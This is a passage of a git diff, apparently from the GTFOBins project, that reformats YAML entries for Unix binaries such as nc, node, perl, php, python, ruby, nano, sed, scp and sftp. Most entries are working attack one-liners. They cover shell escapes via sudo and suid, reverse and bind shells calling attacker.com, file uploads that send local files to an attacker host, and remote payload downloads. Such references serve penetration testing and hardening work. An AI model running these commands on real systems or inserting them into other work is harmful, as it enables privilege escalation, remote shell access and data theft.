-1,17 +1,17 @@ --- functions: execute-interactive: - - code: | - TERM= more /etc/profile - !/bin/sh - sudo-enabled: - - code: | - TERM= sudo -E more /etc/profile - !/bin/sh - suid-enabled: - - code: | - ./more file_to_read + - code: | + TERM= more /etc/profile + !/bin/sh file-read: - - code: | - more file_to_read + - code: 'more file_to_read + +' + suid-enabled: + - code: "./more file_to_read\n" + sudo-enabled: + - code: | + TERM= sudo -E more /etc/profile + !/bin/sh --- diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md index f4895e1..d45f451 100644 --- a/_gtfobins/nano.md +++ b/_gtfobins/nano.md @@ -1,37 +1,38 @@ --- functions: execute-non-interactive: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - nano -s $TF /etc/hosts - ^T - sudo-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - sudo nano -s $TF /etc/hosts - ^T - suid-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo $'#!/bin/sh -p\n'"$COMMAND" > $TF - chmod +x $TF - ./nano -s $TF /etc/hosts - ^T - file-read: - - code: | - nano file_to_read + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + nano -s $TF /etc/hosts + ^T file-write: - - code: | - nano file_to_write - ^O + - code: | + nano file_to_write + ^O + file-read: + - code: 'nano file_to_read + +' + suid-enabled: + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo $'#!/bin/sh -p\n'"$COMMAND" > $TF + chmod +x $TF + ./nano -s $TF /etc/hosts + ^T + sudo-enabled: + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + sudo nano -s $TF /etc/hosts + ^T --- diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md index fc4e27b..b285423 100644 --- a/_gtfobins/nc.md +++ b/_gtfobins/nc.md @@ -1,27 +1,29 @@ --- functions: - upload: - - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_send - nc $RHOST $RPORT < "$LFILE" - download: - - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. - code: | - LPORT=12345 - LFILE=file_to_save - nc -l -p $LPORT > "$LFILE" reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - nc -e /bin/sh $RHOST $RPORT + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + nc -e /bin/sh $RHOST $RPORT bind-shell-interactive: - - description: Run `nc target.com 12345` on the attacker box to connect to the shell. - code: | - LPORT=12345 - nc -l -p $LPORT -e /bin/sh + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + LPORT=12345 + nc -l -p $LPORT -e /bin/sh + upload: + - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` + on the attacker box to collect the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + nc $RHOST $RPORT < "$LFILE" + download: + - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 + < "file_to_send"` on the attacker box to send the file. + code: | + LPORT=12345 + LFILE=file_to_save + nc -l -p $LPORT > "$LFILE" --- diff --git a/_gtfobins/nl.md b/_gtfobins/nl.md index f8309cc..4d57bd2 100644 --- a/_gtfobins/nl.md +++ b/_gtfobins/nl.md @@ -1,17 +1,19 @@ --- -description: | - The read file content is corrupted by a leading space added to each line. +description: 'The read file content is corrupted by a leading space added to each + line. + +' functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo nl -bn -w1 -s '' $LFILE - suid-enabled: - - code: | - LFILE=file_to_read - ./nl -bn -w1 -s '' $LFILE file-read: - - code: | - LFILE=file_to_read - nl -bn -w1 -s '' $LFILE + - code: | + LFILE=file_to_read + nl -bn -w1 -s '' $LFILE + suid-enabled: + - code: | + LFILE=file_to_read + ./nl -bn -w1 -s '' $LFILE + sudo-enabled: + - code: | + LFILE=file_to_read + sudo nl -bn -w1 -s '' $LFILE --- diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 9c9aa35..214c045 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md @@ -1,33 +1,38 @@ --- functions: execute-interactive: - - code: | - node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' - sudo-enabled: - - code: | - sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' - suid-enabled: - - code: | - ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});' + - code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'' + +' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - node -e 'sh = require("child_process").spawn("/bin/sh"); - net.connect(process.env.RPORT, process.env.RHOST, function () { - this.pipe(sh.stdin); - sh.stdout.pipe(this); - sh.stderr.pipe(this); - });' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + node -e 'sh = require("child_process").spawn("/bin/sh"); + net.connect(process.env.RPORT, process.env.RHOST, function () { + this.pipe(sh.stdin); + sh.stdout.pipe(this); + sh.stderr.pipe(this); + });' bind-shell-interactive: - - description: Run `nc target.com 12345` on the attacker box to connect to the shell. - code: | - export LPORT=12345 - node -e 'sh = require("child_process").spawn("/bin/sh"); - require("net").createServer(function (client) { - client.pipe(sh.stdin); - sh.stdout.pipe(client); - sh.stderr.pipe(client); - }).listen(process.env.LPORT);' + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + export LPORT=12345 + node -e 'sh = require("child_process").spawn("/bin/sh"); + require("net").createServer(function (client) { + client.pipe(sh.stdin); + sh.stdout.pipe(client); + sh.stderr.pipe(client); + }).listen(process.env.LPORT);' + suid-enabled: + - code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, + 1, 2]});'' + +' + sudo-enabled: + - code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, + 2]});'' + +' --- diff --git a/_gtfobins/od.md b/_gtfobins/od.md index 4cf623b..8644d85 100644 --- a/_gtfobins/od.md +++ b/_gtfobins/od.md @@ -3,16 +3,16 @@ description: | Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences. functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo od -An -c -w9999 "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./od -An -c -w9999 "$LFILE" file-read: - - code: | - LFILE=file_to_read - od -An -c -w9999 "$LFILE" + - code: | + LFILE=file_to_read + od -An -c -w9999 "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./od -An -c -w9999 "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo od -An -c -w9999 "$LFILE" --- diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md index c423a7f..f781b65 100644 --- a/_gtfobins/perl.md +++ b/_gtfobins/perl.md @@ -1,15 +1,15 @@ --- functions: execute-interactive: - - code: perl -e 'exec "/bin/sh";' - sudo-enabled: - - code: sudo perl -e 'exec "/bin/sh";' - suid-enabled: - - code: ./perl -e 'exec "/bin/sh";' + - code: perl -e 'exec "/bin/sh";' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' + suid-enabled: + - code: ./perl -e 'exec "/bin/sh";' + sudo-enabled: + - code: sudo perl -e 'exec "/bin/sh";' --- diff --git a/_gtfobins/php.md b/_gtfobins/php.md index 944ba2a..ca9e4ea 100644 --- a/_gtfobins/php.md +++ b/_gtfobins/php.md @@ -17,33 +17,34 @@ functions: export CMD="/bin/sh" php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' execute-non-interactive: - - code: | - export CMD="id" - php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' - sudo-enabled: - - code: | - CMD="/bin/sh" - sudo php -r "system('$CMD');" - suid-enabled: - - code: | - CMD="/bin/sh" - ./php -r "system('$CMD');" - upload: - - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later. - code: | - LHOST=0.0.0.0 - LPORT=8888 - php -S $LHOST:$LPORT - download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' + - code: | + export CMD="id" + php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' + upload: + - description: Serve files in the local folder running an HTTP server. This requires + PHP version 5.4 or later. + code: | + LHOST=0.0.0.0 + LPORT=8888 + php -S $LHOST:$LPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' + suid-enabled: + - code: | + CMD="/bin/sh" + ./php -r "system('$CMD');" + sudo-enabled: + - code: | + CMD="/bin/sh" + sudo php -r "system('$CMD');" --- diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md index 24c9ff4..c64f482 100644 --- a/_gtfobins/pico.md +++ b/_gtfobins/pico.md @@ -1,37 +1,38 @@ --- functions: execute-non-interactive: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - pico -s $TF /etc/hosts - ^T - sudo-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo "$COMMAND" > $TF - chmod +x $TF - sudo pico -s $TF /etc/hosts - ^T - suid-enabled: - - description: After running this exit the editor to see the command output. - code: | - COMMAND=id - TF=$(mktemp) - echo $'#!/bin/sh -p\n'"$COMMAND" > $TF - chmod +x $TF - ./pico -s $TF /etc/hosts - ^T - file-read: - - code: | - pico file_to_read + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + pico -s $TF /etc/hosts + ^T file-write: - - code: | - pico file_to_write - ^O + - code: | + pico file_to_write + ^O + file-read: + - code: 'pico file_to_read + +' + suid-enabled: + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo $'#!/bin/sh -p\n'"$COMMAND" > $TF + chmod +x $TF + ./pico -s $TF /etc/hosts + ^T + sudo-enabled: + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + sudo pico -s $TF /etc/hosts + ^T --- diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md index de2c5ef..a4ae2d9 100644 --- a/_gtfobins/puppet.md +++ b/_gtfobins/puppet.md @@ -1,23 +1,24 @@ --- functions: execute-non-interactive: - - description: The executed command output shown in the puppet log format. - code: | - export CMD="/usr/bin/id" - puppet apply -e "exec { '$CMD': logoutput => true }" - sudo-enabled: - - description: The executed command output shown in the puppet log format. - code: | - export CMD="/usr/bin/id" - sudo puppet apply -e "exec { '$CMD': logoutput => true }" - file-read: - - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed. - code: | - export LFILE=file_to_read - puppet filebucket -l diff /dev/null $LFILE + - description: The executed command output shown in the puppet log format. + code: | + export CMD="/usr/bin/id" + puppet apply -e "exec { '$CMD': logoutput => true }" file-write: - - description: The file path must be absolute. - code: | - export LFILE="/tmp/file_to_write" - puppet apply -e "file { '$LFILE': content => 'data' }" + - description: The file path must be absolute. + code: | + export LFILE="/tmp/file_to_write" + puppet apply -e "file { '$LFILE': content => 'data' }" + file-read: + - description: The read file content is corrupted by the `diff` output format. The + actual `/usr/bin/diff` command is executed. + code: | + export LFILE=file_to_read + puppet filebucket -l diff /dev/null $LFILE + sudo-enabled: + - description: The executed command output shown in the puppet log format. + code: | + export CMD="/usr/bin/id" + sudo puppet apply -e "exec { '$CMD': logoutput => true }" --- diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index ea943c0..f2cce96 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -1,37 +1,39 @@ --- functions: execute-interactive: - - code: python2 -c 'import os; os.system("/bin/sh")' - sudo-enabled: - - code: sudo python2 -c 'import os; os.system("/bin/sh")' - suid-enabled: - - code: ./python2 -c 'import os; os.system("/bin/sh -p")' - upload: - - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - code: | - export URL=http://attacker.com/ - export LFILE=file_to_send - python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))' - - description: Serve files in the local folder running an HTTP server. - code: | - export LPORT=8888 - python2 -m SimpleHTTPServer $LPORT - download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' + - code: python2 -c 'import os; os.system("/bin/sh")' reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' - file-read: - - code: python2 -c 'open("file_to_read").read()' + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on + the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + upload: + - description: Send local file via "d" parameter of a HTTP POST request. Run an + HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))' + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=8888 + python2 -m SimpleHTTPServer $LPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' file-write: - - code: python2 -c 'open("file_to_write","w+").write("data")' + - code: python2 -c 'open("file_to_write","w+").write("data")' + file-read: + - code: python2 -c 'open("file_to_read").read()' load-library: - - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + suid-enabled: + - code: ./python2 -c 'import os; os.system("/bin/sh -p")' + sudo-enabled: + - code: sudo python2 -c 'import os; os.system("/bin/sh")' --- diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index 9796842..719151a 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -1,37 +1,39 @@ --- functions: execute-interactive: - - code: python3 -c 'import os; os.system("/bin/sh")' - sudo-enabled: - - code: sudo python3 -c 'import os; os.system("/bin/sh")' - suid-enabled: - - code: ./python3 -c 'import os; os.system("/bin/sh -p")' - upload: - - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - code: | - export URL=http://attacker.com/ - export LFILE=file_to_send - python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' - - description: Serve files in the local folder running an HTTP server. - code: | - LPORT=8888 - python3 -m http.server $LPORT - download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' + - code: python3 -c 'import os; os.system("/bin/sh")' reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' - file-read: - - code: python3 -c 'open("file_to_read").read()' + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on + the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + upload: + - description: Send local file via "d" parameter of a HTTP POST request. Run an + HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' + - description: Serve files in the local folder running an HTTP server. + code: | + LPORT=8888 + python3 -m http.server $LPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' file-write: - - code: python3 -c 'open("file_to_write","w+").write("data")' + - code: python3 -c 'open("file_to_write","w+").write("data")' + file-read: + - code: python3 -c 'open("file_to_read").read()' load-library: - - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' + suid-enabled: + - code: ./python3 -c 'import os; os.system("/bin/sh -p")' + sudo-enabled: + - code: sudo python3 -c 'import os; os.system("/bin/sh")' --- diff --git a/_gtfobins/rlwrap.md b/_gtfobins/rlwrap.md index 65c1639..254f12d 100644 --- a/_gtfobins/rlwrap.md +++ b/_gtfobins/rlwrap.md @@ -1,14 +1,15 @@ --- functions: execute-interactive: - - code: rlwrap /bin/sh - sudo-enabled: - - code: sudo rlwrap /bin/sh - suid-enabled: - - code: ./rlwrap -H /dev/null /bin/sh -p + - code: rlwrap /bin/sh file-write: - - description: This adds timestamps to the output file. This relies on the external `echo` command. - code: | - LFILE=file_to_write - rlwrap -l "$LFILE" echo data + - description: This adds timestamps to the output file. This relies on the external + `echo` command. + code: | + LFILE=file_to_write + rlwrap -l "$LFILE" echo data + suid-enabled: + - code: "./rlwrap -H /dev/null /bin/sh -p" + sudo-enabled: + - code: sudo rlwrap /bin/sh --- diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index 67d2f53..268c69f 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' - sudo-enabled: - - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' + - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' suid-enabled: - - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' + - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' + sudo-enabled: + - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' --- diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md index 5d9eee1..ce85849 100644 --- a/_gtfobins/rpmquery.md +++ b/_gtfobins/rpmquery.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - sudo-enabled: - - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' + - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' suid-enabled: - - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' + - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' + sudo-enabled: + - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' --- diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index 0c36e04..1039257 100644 --- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md @@ -1,32 +1,33 @@ --- functions: execute-interactive: - - code: ruby -e 'exec "/bin/sh"' - sudo-enabled: - - code: sudo ruby -e 'exec "/bin/sh"' - upload: - - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later. - code: | - export LPORT=8888 - ruby -run -e httpd . -p $LPORT - download: - - description: Fetch a remote file via HTTP GET request. - code: | - export RHOST=attacker.com - export RPORT=12345 - export RFILE=/file_to_get - export LFILE=file_to_save - ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }' + - code: ruby -e 'exec "/bin/sh"' reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' - file-read: - - code: ruby -e 'puts File.read("file_to_read")' + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' + upload: + - description: Serve files in the local folder running an HTTP server. This requires + version 1.9.2 or later. + code: | + export LPORT=8888 + ruby -run -e httpd . -p $LPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: | + export RHOST=attacker.com + export RPORT=12345 + export RFILE=/file_to_get + export LFILE=file_to_save + ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }' file-write: - - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }' + - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }' + file-read: + - code: ruby -e 'puts File.read("file_to_read")' load-library: - - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' + - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' + sudo-enabled: + - code: sudo ruby -e 'exec "/bin/sh"' --- diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md index 9cc7489..711cf53 100644 --- a/_gtfobins/scp.md +++ b/_gtfobins/scp.md @@ -1,36 +1,36 @@ --- functions: execute-non-interactive: - - code: | - TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" - chmod +x "$TF" - scp -S $TF x y: - sudo-enabled: - - code: | - TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" - chmod +x "$TF" - sudo scp -S $TF x y: - suid-limited: - - code: | - TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" - chmod +x "$TF" - ./scp -S $TF a b: + - code: | + TF=$(mktemp) + CMD="id" + echo "$CMD" > "$TF" + chmod +x "$TF" + scp -S $TF x y: upload: - - description: Send local file to a SSH server. - code: | - RPATH=user@attacker.com:~/file_to_save - LPATH=file_to_send - scp $LFILE $RPATH + - description: Send local file to a SSH server. + code: | + RPATH=user@attacker.com:~/file_to_save + LPATH=file_to_send + scp $LFILE $RPATH download: - - description: Fetch a remote file from a SSH server. - code: | - RPATH=user@attacker.com:~/file_to_get - LFILE=file_to_save - scp $RPATH $LFILE + - description: Fetch a remote file from a SSH server. + code: | + RPATH=user@attacker.com:~/file_to_get + LFILE=file_to_save + scp $RPATH $LFILE + sudo-enabled: + - code: | + TF=$(mktemp) + CMD="id" + echo "$CMD" > "$TF" + chmod +x "$TF" + sudo scp -S $TF x y: + suid-limited: + - code: | + TF=$(mktemp) + CMD="id" + echo "$CMD" > "$TF" + chmod +x "$TF" + ./scp -S $TF a b: --- diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md index fca942b..0cd0df4 100644 --- a/_gtfobins/sed.md +++ b/_gtfobins/sed.md @@ -1,24 +1,24 @@ --- functions: execute-interactive: - - description: GNU version only. Also, this requires `bash`. - code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + - description: GNU version only. Also, this requires `bash`. + code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts execute-non-interactive: - - description: GNU version only. - code: sed -n "1e id" /etc/hosts - sudo-enabled: - - description: GNU version only. Also, this requires `bash`. - code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts - suid-enabled: - - code: | - LFILE=file_to_read - ./sed -e '' "$LFILE" - file-read: - - code: | - LFILE=file_to_read - sed '' "$LFILE" + - description: GNU version only. + code: sed -n "1e id" /etc/hosts file-write: - - code: | - LFILE=file_to_write - sed -n "1s/.*/data/w $LFILE" /etc/hosts + - code: | + LFILE=file_to_write + sed -n "1s/.*/data/w $LFILE" /etc/hosts + file-read: + - code: | + LFILE=file_to_read + sed '' "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./sed -e '' "$LFILE" + sudo-enabled: + - description: GNU version only. Also, this requires `bash`. + code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts --- diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md index af80824..cdc0aed 100644 --- a/_gtfobins/setarch.md +++ b/_gtfobins/setarch.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: setarch $(arch) /bin/sh - sudo-enabled: - - code: sudo setarch $(arch) /bin/sh + - code: setarch $(arch) /bin/sh suid-enabled: - - code: ./setarch $(arch) /bin/sh -p + - code: "./setarch $(arch) /bin/sh -p" + sudo-enabled: + - code: sudo setarch $(arch) /bin/sh --- diff --git a/_gtfobins/sftp.md b/_gtfobins/sftp.md index 8c528e8..743b96f 100644 --- a/_gtfobins/sftp.md +++ b/_gtfobins/sftp.md @@ -1,25 +1,25 @@ --- functions: execute-interactive: - - code: | - HOST=user@attacker.com - sftp $HOST - !/bin/sh - sudo-enabled: - - code: | - HOST=user@attacker.com - sudo sftp $HOST - !/bin/sh + - code: | + HOST=user@attacker.com + sftp $HOST + !/bin/sh upload: - - description: Send local file to a SSH server. - code: | - RHOST=user@attacker.com - sftp $RHOST - put file_to_send file_to_save + - description: Send local file to a SSH server. + code: | + RHOST=user@attacker.com + sftp $RHOST + put file_to_send file_to_save download: - - description: Fetch a remote file from a SSH server. - code: | - RHOST=user@attacker.com - sftp $RHOST - get file_to_get file_to_save + - description: Fetch a remote file from a SSH server. + code: | + RHOST=user@attacker.com + sftp $RHOST + get file_to_get file_to_save + sudo-enabled: + - code: | + HOST=user@attacker.com + sudo sftp $HOST + !/bin/sh --- diff --git a/_gtfobins/shuf.md b/_gtfobins/shuf.md index 318fcd2..924ea0e 100644 --- a/_gtfobins/shuf.md +++ b/_gtfobins/shuf.md @@ -1,17 +1,17 @@ --- description: The read file content is corrupted by adding a newline. functions: - sudo-enabled: - - code: | - LFILE=file_to_write - sudo shuf -e data -o "$LFILE" - suid-enabled: - - description: - code: | - LFILE=file_to_write - ./shuf -e data -o "$LFILE" file-write: - - code: | - LFILE=file_to_write - shuf -e data -o "$LFILE" + - code: | + 